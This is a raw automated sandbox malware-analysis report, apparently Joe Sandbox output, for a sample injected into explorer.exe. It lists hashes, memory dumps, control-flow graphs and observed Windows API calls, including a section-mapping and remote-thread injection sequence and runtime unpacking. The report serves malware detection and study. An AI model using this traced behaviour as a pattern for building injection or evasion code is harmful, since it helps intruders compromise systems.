                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2505713156.000000000AC41000.00000020.80000000.00040000.00000000.sdmp, Offset: 0AC41000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_ac41000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Create$FileInformationMappingMutexVolume
                                                                                                            • String ID:
                                                                                                            • API String ID: 3260430491-0
                                                                                                            • Opcode ID: 9e9a34ea7cb298080777c61faf39ef342cf239ea35ae18d0dbcb535cd23d3ff0
                                                                                                            • Instruction ID: cb630ec9e2595ef561918961b78b416a9a0729fca66b257812701a866a5c3e22
                                                                                                            • Opcode Fuzzy Hash: 9e9a34ea7cb298080777c61faf39ef342cf239ea35ae18d0dbcb535cd23d3ff0
                                                                                                            • Instruction Fuzzy Hash: 75417230B14F0C8FEB64EF38C0187AA76D2EB98716F154A2DD09FC6145CF749A429B49

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                              • Part of subcall function 08384D20: GetVolumeInformationA.KERNEL32 ref: 08384D8D
                                                                                                            • CreateMutexExA.KERNEL32 ref: 08381E8F
                                                                                                            • CreateFileMappingA.KERNEL32 ref: 08381F41
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2501060273.0000000008381000.00000020.80000000.00040000.00000000.sdmp, Offset: 08381000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_8381000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Create$FileInformationMappingMutexVolume
                                                                                                            • String ID:
                                                                                                            • API String ID: 3260430491-0
                                                                                                            • Opcode ID: 9e9a34ea7cb298080777c61faf39ef342cf239ea35ae18d0dbcb535cd23d3ff0
                                                                                                            • Instruction ID: 8f6b82f1043a61ce93eb1c8db76bd9f344dacfdccc2b79e93fd77f0cc8f90e1c
                                                                                                            • Opcode Fuzzy Hash: 9e9a34ea7cb298080777c61faf39ef342cf239ea35ae18d0dbcb535cd23d3ff0
                                                                                                            • Instruction Fuzzy Hash: AB414E30714F08CFEB65FB3880587AE76D2EBD8707F104A2E805ED6245CF7496069785

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetTokenInformation.KERNELBASE ref: 0AC44B24
                                                                                                            • GetTokenInformation.KERNELBASE ref: 0AC44B5B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2505713156.000000000AC41000.00000020.80000000.00040000.00000000.sdmp, Offset: 0AC41000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_ac41000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: InformationToken
                                                                                                            • String ID:
                                                                                                            • API String ID: 4114910276-0
                                                                                                            • Opcode ID: 37b38c91b308edf2e4bebcb754188a08756fa8f3a9c0e1e81f7644c00244d549
                                                                                                            • Instruction ID: d20b3a2d55fdf93f46b251fec5cc04c5b3285d487ad4f68fb9e470848b21461f
                                                                                                            • Opcode Fuzzy Hash: 37b38c91b308edf2e4bebcb754188a08756fa8f3a9c0e1e81f7644c00244d549
                                                                                                            • Instruction Fuzzy Hash: E2213C34608A088FC754EF2CC49866AB7E1FB99311B054A6EE49AC7264DE30EC45DB82

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetTokenInformation.KERNELBASE ref: 08384B24
                                                                                                            • GetTokenInformation.KERNELBASE ref: 08384B5B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2501060273.0000000008381000.00000020.80000000.00040000.00000000.sdmp, Offset: 08381000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_8381000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: InformationToken
                                                                                                            • String ID:
                                                                                                            • API String ID: 4114910276-0
                                                                                                            • Opcode ID: 37b38c91b308edf2e4bebcb754188a08756fa8f3a9c0e1e81f7644c00244d549
                                                                                                            • Instruction ID: 2d9d26b6db4055b693fca8078f36d56efe9aa7d4d6e75a3c4cc6fda53a265262
                                                                                                            • Opcode Fuzzy Hash: 37b38c91b308edf2e4bebcb754188a08756fa8f3a9c0e1e81f7644c00244d549
                                                                                                            • Instruction Fuzzy Hash: E8213E34608B088FCB54FF28C49866AB7E1FBD9311B044A6EA49AC7364DA70D845DB82

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 518 8383c84-8383c9b 519 8383d3b-8383d54 518->519 520 8383ca1-8383cb3 CreateToolhelp32Snapshot 518->520 521 8383d23-8383d35 SleepEx 520->521 522 8383cb5-8383ccb 520->522 521->519 521->520 524 8383d16-8383d18 522->524 525 8383d1a-8383d1b 524->525 526 8383ccd-8383ce4 call 8385140 524->526 525->521 529 8383ce6-8383ce8 526->529 530 8383cea-8383cf8 529->530 531 8383cfc-8383d03 call 83847a4 529->531 530->529 532 8383cfa 530->532 534 8383d08-8383d0e 531->534 532->534 534->524
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2501060273.0000000008381000.00000020.80000000.00040000.00000000.sdmp, Offset: 08381000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_8381000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateSleepSnapshotToolhelp32
                                                                                                            • String ID:
                                                                                                            • API String ID: 684154974-0
                                                                                                            • Opcode ID: d87648c068091f5a601a251f696ac908138681014b07281b27555691989c57a1
                                                                                                            • Instruction ID: 1acae57d0b090423aa6c087967ff0aba398da5b33c72d8cb1ef16c7cc91b0bcb
                                                                                                            • Opcode Fuzzy Hash: d87648c068091f5a601a251f696ac908138681014b07281b27555691989c57a1
                                                                                                            • Instruction Fuzzy Hash: 98219030218B09CFDB18FF64C0987AA72E2FBC8716F180A7ED84BDA395DB7595458B11

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 538 ac43d60-ac43d70 539 ac43d96-ac43da4 538->539 540 ac43d72-ac43d94 EnumWindows SleepEx 538->540 540->539 540->540
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2505713156.000000000AC41000.00000020.80000000.00040000.00000000.sdmp, Offset: 0AC41000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_ac41000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: EnumSleepWindows
                                                                                                            • String ID:
                                                                                                            • API String ID: 498413330-0
                                                                                                            • Opcode ID: bcd33d68b26800d53c1a0055312e6970b5242bc1254dfeb745dd1bbf27494588
                                                                                                            • Instruction ID: 7f4848cae3290080b639270e6ffe739850d9264f6cf0ccfeb8a3a72f2a010657
                                                                                                            • Opcode Fuzzy Hash: bcd33d68b26800d53c1a0055312e6970b5242bc1254dfeb745dd1bbf27494588
                                                                                                            • Instruction Fuzzy Hash: 56E04F30514A098FFB68AFA4C4DCBB032A1EB58206F15017ADC0EDD295CB768945CB24

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 535 8383d60-8383d70 536 8383d72-8383d94 EnumWindows SleepEx 535->536 537 8383d96-8383da4 535->537 536->536 536->537
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2501060273.0000000008381000.00000020.80000000.00040000.00000000.sdmp, Offset: 08381000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_8381000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: EnumSleepWindows
                                                                                                            • String ID:
                                                                                                            • API String ID: 498413330-0
                                                                                                            • Opcode ID: bcd33d68b26800d53c1a0055312e6970b5242bc1254dfeb745dd1bbf27494588
                                                                                                            • Instruction ID: 9286ea765277d72b3900bc65c706766eada7794a6df64ca825c45e615dc9b78b
                                                                                                            • Opcode Fuzzy Hash: bcd33d68b26800d53c1a0055312e6970b5242bc1254dfeb745dd1bbf27494588
                                                                                                            • Instruction Fuzzy Hash: 0FE04F30504A09CFEB28ABA4C0DCBB032A1EB58206F14017EDC0EDD395CB7A4949CB20
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2505713156.000000000AC41000.00000020.80000000.00040000.00000000.sdmp, Offset: 0AC41000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_ac41000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e4a96c0002796f4483eb6bc6feb746ec78d293e7f1134298137c4194076fbbcd
                                                                                                            • Instruction ID: 3237d836e13b3228a3e2531a98685a011a94dfe3bfc0d578b2aea07aea7a095d
                                                                                                            • Opcode Fuzzy Hash: e4a96c0002796f4483eb6bc6feb746ec78d293e7f1134298137c4194076fbbcd
                                                                                                            • Instruction Fuzzy Hash: 1AD19030728B0D8BDB68EF6C94457AEB7E2FB98701F11452DE44AD3241DF74E9029B86
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2505713156.000000000AC41000.00000020.80000000.00040000.00000000.sdmp, Offset: 0AC41000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_ac41000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateInstance
                                                                                                            • String ID:
                                                                                                            • API String ID: 542301482-0
                                                                                                            • Opcode ID: b35aeaa2dabb4e76190c9dece0e8e20c87b044d0080395537af34a5cdc12a271
                                                                                                            • Instruction ID: 81567a7054c42a40f486e97b5978d64c24ee9890d797a87ce4d6655d0996a088
                                                                                                            • Opcode Fuzzy Hash: b35aeaa2dabb4e76190c9dece0e8e20c87b044d0080395537af34a5cdc12a271
                                                                                                            • Instruction Fuzzy Hash: 01E1F934608A4C8FCF94EF68C885EA9B7F1FFA9305F114699E44ACB265DB70E944CB41
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2501060273.0000000008381000.00000020.80000000.00040000.00000000.sdmp, Offset: 08381000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_8381000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 823142352-0
                                                                                                            • Opcode ID: 11cbd7d4e9e3daf7bdfec7693b32ce184b43af76b4895d117b786d6ffa4ff202
                                                                                                            • Instruction ID: 97ef057313f14abe628141ff6a5051f909295ed87cc93c69a1b6920d819abe27
                                                                                                            • Opcode Fuzzy Hash: 11cbd7d4e9e3daf7bdfec7693b32ce184b43af76b4895d117b786d6ffa4ff202
                                                                                                            • Instruction Fuzzy Hash: 44413930718B4C8FDBA8BFAC945836E76D2EBC8612F14457EA80EC3385DE749D068785
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2505713156.000000000AC41000.00000020.80000000.00040000.00000000.sdmp, Offset: 0AC41000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_ac41000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 823142352-0
                                                                                                            • Opcode ID: ce663faf5a716b1ca10baa4e22fa9f7e4c3774f53785b3b9c2244f163c36e0eb
                                                                                                            • Instruction ID: 0172577ffbb16fb88c148d2b78da83c807056abfe002bd65a920c9360a464a6d
                                                                                                            • Opcode Fuzzy Hash: ce663faf5a716b1ca10baa4e22fa9f7e4c3774f53785b3b9c2244f163c36e0eb
                                                                                                            • Instruction Fuzzy Hash: A241C03071CF4D4FD75CEA6C98593BABAC2EBC8221F15122EA89BC3345DE649C1247C6
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2501060273.0000000008381000.00000020.80000000.00040000.00000000.sdmp, Offset: 08381000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_8381000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 823142352-0
                                                                                                            • Opcode ID: ce663faf5a716b1ca10baa4e22fa9f7e4c3774f53785b3b9c2244f163c36e0eb
                                                                                                            • Instruction ID: cb8551440d0d6ce3a36b61280f0b4381adf49abca424f1579cf4798901b9c8c1
                                                                                                            • Opcode Fuzzy Hash: ce663faf5a716b1ca10baa4e22fa9f7e4c3774f53785b3b9c2244f163c36e0eb
                                                                                                            • Instruction Fuzzy Hash: B941A03071CB0D8FDB59BB6C985937AB6C2EBC8612F54422EA89BC3345DE64981647C2
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2501060273.0000000008381000.00000020.80000000.00040000.00000000.sdmp, Offset: 08381000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_8381000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: QueryValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 3660427363-0
                                                                                                            • Opcode ID: 1ee60c0f534f3764a8b7c02e3106e8c1bbbc8228cd7f8668cbf5d1b2e0d7aa71
                                                                                                            • Instruction ID: c3ef7c0e69dc62f6df4571b25281439dc7ca0ab64617d8ae4acfe08c8620cf34
                                                                                                            • Opcode Fuzzy Hash: 1ee60c0f534f3764a8b7c02e3106e8c1bbbc8228cd7f8668cbf5d1b2e0d7aa71
                                                                                                            • Instruction Fuzzy Hash: 4231AF31608A0D8FDF18FF6898896EA77E5FBD8315B00027EE84AC3645EE6098068791
                                                                                                            APIs
                                                                                                            • GetVolumeInformationA.KERNEL32 ref: 0AC44D8D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2505713156.000000000AC41000.00000020.80000000.00040000.00000000.sdmp, Offset: 0AC41000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_ac41000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: InformationVolume
                                                                                                            • String ID:
                                                                                                            • API String ID: 2039140958-0
                                                                                                            • Opcode ID: f6d21cd985884bbd1fecacc52d91767e00694267905ea377f3a61296193c8c2d
                                                                                                            • Instruction ID: ce03921138fb1e39f3d99c7d29dfdd61d4497253d781c0521d6c45e2f02e5089
                                                                                                            • Opcode Fuzzy Hash: f6d21cd985884bbd1fecacc52d91767e00694267905ea377f3a61296193c8c2d
                                                                                                            • Instruction Fuzzy Hash: 0C316530618A4C8FDB64EF68C448BAA77E1FBD8311F10466ED84EC7265DE70D945CB82
                                                                                                            APIs
                                                                                                            • GetVolumeInformationA.KERNEL32 ref: 08384D8D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2501060273.0000000008381000.00000020.80000000.00040000.00000000.sdmp, Offset: 08381000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_8381000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: InformationVolume
                                                                                                            • String ID:
                                                                                                            • API String ID: 2039140958-0
                                                                                                            • Opcode ID: f6d21cd985884bbd1fecacc52d91767e00694267905ea377f3a61296193c8c2d
                                                                                                            • Instruction ID: e4d475b2ceaf3392fcbc01473faa1bdc75ac3ebd489f1faf5dc8069aba718143
                                                                                                            • Opcode Fuzzy Hash: f6d21cd985884bbd1fecacc52d91767e00694267905ea377f3a61296193c8c2d
                                                                                                            • Instruction Fuzzy Hash: BC310F31618B4C8FDB64FF688448BAA77E1FBD8311F10466E984EC7264DE70D945CB82
                                                                                                            APIs
                                                                                                              • Part of subcall function 0AC41A60: RtlCreateHeap.NTDLL ref: 0AC41B77
                                                                                                            • SleepEx.KERNEL32(?,?,?,?,?,?,?,0AC41A03), ref: 0AC41A30
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2505713156.000000000AC41000.00000020.80000000.00040000.00000000.sdmp, Offset: 0AC41000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_ac41000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateHeapSleep
                                                                                                            • String ID:
                                                                                                            • API String ID: 221814145-0
                                                                                                            • Opcode ID: 9adc8d4cde1f516ddaa5c4750073014e5650bc8f10d33b0d75f43d3a0b67238f
                                                                                                            • Instruction ID: 97e23f39c96a8474f4a319f200000a9cceb395b25bb16d8d338e2a89bef85939
                                                                                                            • Opcode Fuzzy Hash: 9adc8d4cde1f516ddaa5c4750073014e5650bc8f10d33b0d75f43d3a0b67238f
                                                                                                            • Instruction Fuzzy Hash: 2FE02020314F0C0BDBA4BF79D0C432C6090D7C8210F4A067DA58DC7281DC34C9C14315
                                                                                                            APIs
                                                                                                              • Part of subcall function 08381A60: RtlCreateHeap.NTDLL ref: 08381B77
                                                                                                            • SleepEx.KERNEL32(?,?,?,?,?,?,?,08381A03), ref: 08381A30
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2501060273.0000000008381000.00000020.80000000.00040000.00000000.sdmp, Offset: 08381000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_8381000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateHeapSleep
                                                                                                            • String ID:
                                                                                                            • API String ID: 221814145-0
                                                                                                            • Opcode ID: 9adc8d4cde1f516ddaa5c4750073014e5650bc8f10d33b0d75f43d3a0b67238f
                                                                                                            • Instruction ID: e16cdd15638477a1a0b6a0dcfefd83fac20c576ab67fcf16ad6ad04633690659
                                                                                                            • Opcode Fuzzy Hash: 9adc8d4cde1f516ddaa5c4750073014e5650bc8f10d33b0d75f43d3a0b67238f
                                                                                                            • Instruction Fuzzy Hash: A6E04F24714B08CBDBD8BBB8D4C432DB190EBC8252F90157EA91ECB285E828C9838311

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:8.5%
                                                                                                            Dynamic/Decrypted Code Coverage:19.9%
                                                                                                            Signature Coverage:0%
                                                                                                            Total number of Nodes:156
                                                                                                            Total number of Limit Nodes:6
                                                                                                            execution_graph 4130 402e42 4133 402e47 4130->4133 4131 402f18 4132 401902 8 API calls 4131->4132 4135 402f4c 4131->4135 4132->4135 4133->4131 4134 4020ea NtQuerySystemInformation 4133->4134 4133->4135 4134->4131 4289 418986 4290 418990 4289->4290 4291 418940 SetPriorityClass 4290->4291 4292 4189ad 4290->4292 4291->4290 4236 40190e 4237 401912 4236->4237 4239 4018b5 4236->4239 4238 401946 Sleep 4237->4238 4240 401961 4238->4240 4241 401529 7 API calls 4240->4241 4242 401972 4240->4242 4241->4242 4003 418ed0 4006 418a70 4003->4006 4005 418ed5 4007 418a7d 4006->4007 4008 418b80 7 API calls 4007->4008 4009 418cc6 4007->4009 4011 418bf8 7 API calls 4008->4011 4010 418cd4 SetCommState 4009->4010 4014 418ced 4009->4014 4010->4009 4012 418ca4 4011->4012 4013 418c98 ObjectPrivilegeAuditAlarmW 4011->4013 4015 418cb5 4012->4015 4016 418cad WaitForSingleObject 4012->4016 4013->4012 4017 418daa 4014->4017 4018 418cfa 9 API calls 4014->4018 4015->4009 4016->4015 4030 418740 LocalAlloc 4017->4030 4025 418d88 4018->4025 4022 418daf LoadLibraryA 4031 418770 GetModuleHandleW GetProcAddress VirtualProtect 4022->4031 4023 418dfd 4032 4189d0 4023->4032 4025->4017 4026 418e02 4027 418e43 InterlockedCompareExchange 4026->4027 4028 418e23 MoveFileW 4026->4028 4029 418e5d 4026->4029 4027->4026 4028->4026 4029->4005 4030->4022 4031->4023 4033 4189f9 QueryDosDeviceW 4032->4033 4034 418a0a 4032->4034 4033->4034 4043 418910 4034->4043 4037 418a25 4046 418950 4037->4046 4038 418a1d FreeEnvironmentStringsA 4038->4037 4041 418a57 4041->4026 4042 418a3c HeapCreate GetNumaProcessorNode 4042->4041 4044 418921 FatalAppExitA GetModuleHandleA 4043->4044 4045 418933 4043->4045 4044->4045 4045->4037 4045->4038 4047 41896c 4046->4047 4048 41895e BuildCommDCBA 4046->4048 4049 418974 FreeEnvironmentStringsA 4047->4049 4052 41897c 4047->4052 4048->4052 4049->4052 4050 4189ad 4050->4041 4050->4042 4052->4050 4053 418940 4052->4053 4056 4188c0 4053->4056 4057 4188eb 4056->4057 4058 4188dc SetPriorityClass 4056->4058 4057->4052 4058->4057 4059 5cfd0e 4060 5cfd12 4059->4060 4062 5cfd1e 4059->4062 4063 5cfd1f 4060->4063 4064 5cfd2e 4063->4064 4067 5d04bf 4064->4067 4068 5d04da 4067->4068 4069 5d04e3 CreateToolhelp32Snapshot 4068->4069 4070 5d04ff Module32First 4068->4070 4069->4068 4069->4070 4071 5d050e 4070->4071 4072 5cfd37 4070->4072 4074 5d017e 4071->4074 4072->4062 4075 5d01a9 4074->4075 4076 5d01ba VirtualAlloc 4075->4076 4077 5d01f2 4075->4077 4076->4077 4077->4077 4142 4014db 4143 40148f 4142->4143 4151 401469 4142->4151 4143->4142 4144 4015d5 NtDuplicateObject 4143->4144 4143->4151 4145 4015f2 NtCreateSection 4144->4145 4144->4151 4146 401672 NtCreateSection 4145->4146 4147 401618 NtMapViewOfSection 4145->4147 4149 40169e 4146->4149 4146->4151 4147->4146 4148 40163b NtMapViewOfSection 4147->4148 4148->4146 4150 401659 4148->4150 4149->4151 4152 4016a8 NtMapViewOfSection 4149->4152 4150->4146 4152->4151 4153 4016cf NtMapViewOfSection 4152->4153 4153->4151 4247 401922 4248 401930 4247->4248 4249 401946 Sleep 4248->4249 4250 401961 4249->4250 4251 401529 7 API calls 4250->4251 4252 401972 4250->4252 4251->4252 4078 5a003c 4079 5a0049 4078->4079 4091 5a0e0f SetErrorMode SetErrorMode 4079->4091 4084 5a0265 4085 5a02ce VirtualProtect 4084->4085 4087 5a030b 4085->4087 4086 5a0439 VirtualFree 4090 5a04be LoadLibraryA 4086->4090 4087->4086 4089 5a08c7 4090->4089 4092 5a0223 4091->4092 4093 5a0d90 4092->4093 4094 5a0dad 4093->4094 4095 5a0dbb GetPEB 4094->4095 4096 5a0238 VirtualAlloc 4094->4096 4095->4096 4096->4084 4263 5a092b GetPEB 4264 5a0972 4263->4264 4271 401534 4272 401546 4271->4272 4273 4015d5 NtDuplicateObject 4272->4273 4277 4016f1 4272->4277 4274 4015f2 NtCreateSection 4273->4274 4273->4277 4275 401672 NtCreateSection 4274->4275 4276 401618 NtMapViewOfSection 4274->4276 4275->4277 4279 40169e 4275->4279 4276->4275 4278 40163b NtMapViewOfSection 4276->4278 4278->4275 4282 401659 4278->4282 4279->4277 4280 4016a8 NtMapViewOfSection 4279->4280 4280->4277 4281 4016cf NtMapViewOfSection 4280->4281 4281->4277 4282->4275 4097 402ffa 4098 40313d 4097->4098 4099 403024 4097->4099 4099->4098 4100 4030df RtlCreateUserThread NtTerminateProcess 4099->4100 4100->4098 4101 402ebc 4102 402eb4 4101->4102 4103 402f4c 4102->4103 4104 402f18 4102->4104 4107 4020ea 4102->4107 4104->4103 4112 401902 4104->4112 4108 4020fb 4107->4108 4109 40214e 4108->4109 4110 402152 NtQuerySystemInformation 4108->4110 4111 40216e 4108->4111 4109->4108 4109->4110 4110->4109 4111->4104 4113 401913 4112->4113 4114 401946 Sleep 4113->4114 4115 401961 4114->4115 4117 401972 4115->4117 4118 401529 4115->4118 4117->4103 4119 401539 4118->4119 4120 4016f1 4119->4120 4121 4015d5 NtDuplicateObject 4119->4121 4120->4117 4121->4120 4122 4015f2 NtCreateSection 4121->4122 4123 401672 NtCreateSection 4122->4123 4124 401618 NtMapViewOfSection 4122->4124 4123->4120 4126 40169e 4123->4126 4124->4123 4125 40163b NtMapViewOfSection 4124->4125 4125->4123 4127 401659 4125->4127 4126->4120 4128 4016a8 NtMapViewOfSection 4126->4128 4127->4123 4128->4120 4129 4016cf NtMapViewOfSection 4128->4129 4129->4120 4154 4020fc 4155 402107 4154->4155 4156 402152 NtQuerySystemInformation 4155->4156 4157 40216e 4155->4157 4156->4155

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 0 418a70-418a98 2 418aa0-418aa7 0->2 3 418ad4-418ada 2->3 4 418aa9-418ad0 2->4 5 418adc-418ae8 3->5 6 418aee-418af8 3->6 4->3 5->6 7 418b33-418b3a 6->7 8 418afa-418b29 6->8 7->2 9 418b40-418b46 7->9 8->7 10 418b48-418b4e 9->10 12 418b50-418b56 10->12 13 418b5c-418b66 10->13 12->13 14 418b68 13->14 15 418b6a-418b71 13->15 14->15 15->10 16 418b73-418b7a 15->16 17 418b80-418c96 InterlockedCompareExchange GetFocus ReadConsoleA FindAtomA SearchPathA SetConsoleMode SearchPathW GetDefaultCommConfigA CopyFileExW CreatePipe GetEnvironmentStringsW WriteConsoleOutputA GetModuleFileNameA GetSystemTimeAdjustment 16->17 18 418cc6-418cd2 16->18 22 418ca4-418cab 17->22 23 418c98-418c9e ObjectPrivilegeAuditAlarmW 17->23 19 418cd4-418ce2 SetCommState 18->19 24 418ce4-418ceb 19->24 25 418ced-418cf4 19->25 26 418cb5-418cc3 22->26 27 418cad-418caf WaitForSingleObject 22->27 23->22 24->19 24->25 28 418daa-418db9 call 418740 25->28 29 418cfa-418da4 GetConsoleAliasesLengthW GetComputerNameA CopyFileW GetFileAttributesA GetConsoleAliasExesLengthW GetBinaryType FormatMessageA GetLongPathNameA PurgeComm 25->29 26->18 27->26 35 418dbb-418dcc 28->35 36 418ded-418df8 LoadLibraryA call 418770 28->36 29->28 37 418dd0-418de0 35->37 42 418dfd-418e0e call 4189d0 36->42 40 418de2 37->40 41 418de8-418deb 37->41 40->41 41->36 41->37 46 418e10-418e17 42->46 48 418e19-418e27 MoveFileW 46->48 49 418e2d-418e33 46->49 48->49 51 418e35 call 418760 49->51 52 418e3a-418e41 49->52 51->52 55 418e43-418e4e InterlockedCompareExchange 52->55 56 418e54-418e5b 52->56 55->56 56->46 57 418e5d-418e6d 56->57 59 418e70-418e80 57->59 60 418e82 59->60 61 418e89-418e8c 59->61 60->61 61->59 62 418e8e-418e99 61->62 63 418ea0-418ea5 62->63 64 418ea7-418ead 63->64 65 418eaf-418eb5 63->65 64->65 66 418eb7-418ec4 64->66 65->63 65->66
                                                                                                            APIs
                                                                                                            • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00418B8B
                                                                                                            • GetFocus.USER32 ref: 00418B91
                                                                                                            • ReadConsoleA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00418B9E
                                                                                                            • FindAtomA.KERNEL32(00000000), ref: 00418BA5
                                                                                                            • SearchPathA.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00418BBD
                                                                                                            • SetConsoleMode.KERNEL32(00000000,00000000), ref: 00418BC5
                                                                                                            • SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00418BDD
                                                                                                            • GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 00418C04
                                                                                                            • CopyFileExW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00418C10
                                                                                                            • CreatePipe.KERNEL32(?,00000000,00000000,00000000), ref: 00418C26
                                                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 00418C2C
                                                                                                            • WriteConsoleOutputA.KERNEL32(00000000,?,?,?,?), ref: 00418C71
                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 00418C80
                                                                                                            • GetSystemTimeAdjustment.KERNEL32(00000000,00000000,00000000), ref: 00418C89
                                                                                                            • ObjectPrivilegeAuditAlarmW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00418C9E
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00418CAF
                                                                                                            • SetCommState.KERNELBASE(00000000,00000000), ref: 00418CD8
                                                                                                            • GetConsoleAliasesLengthW.KERNEL32(00000000), ref: 00418D09
                                                                                                            • GetComputerNameA.KERNEL32(?,?), ref: 00418D1D
                                                                                                            • CopyFileW.KERNEL32(0041A3AC,0041A380,00000000), ref: 00418D2E
                                                                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 00418D35
                                                                                                            • GetConsoleAliasExesLengthW.KERNEL32 ref: 00418D3B
                                                                                                            • GetBinaryType.KERNEL32(0041A3C8,?), ref: 00418D4D
                                                                                                            • FormatMessageA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00418D60
                                                                                                            • GetLongPathNameA.KERNEL32(0041A3E4,?,00000000), ref: 00418D73
                                                                                                            • PurgeComm.KERNEL32(00000000,00000000), ref: 00418D7B
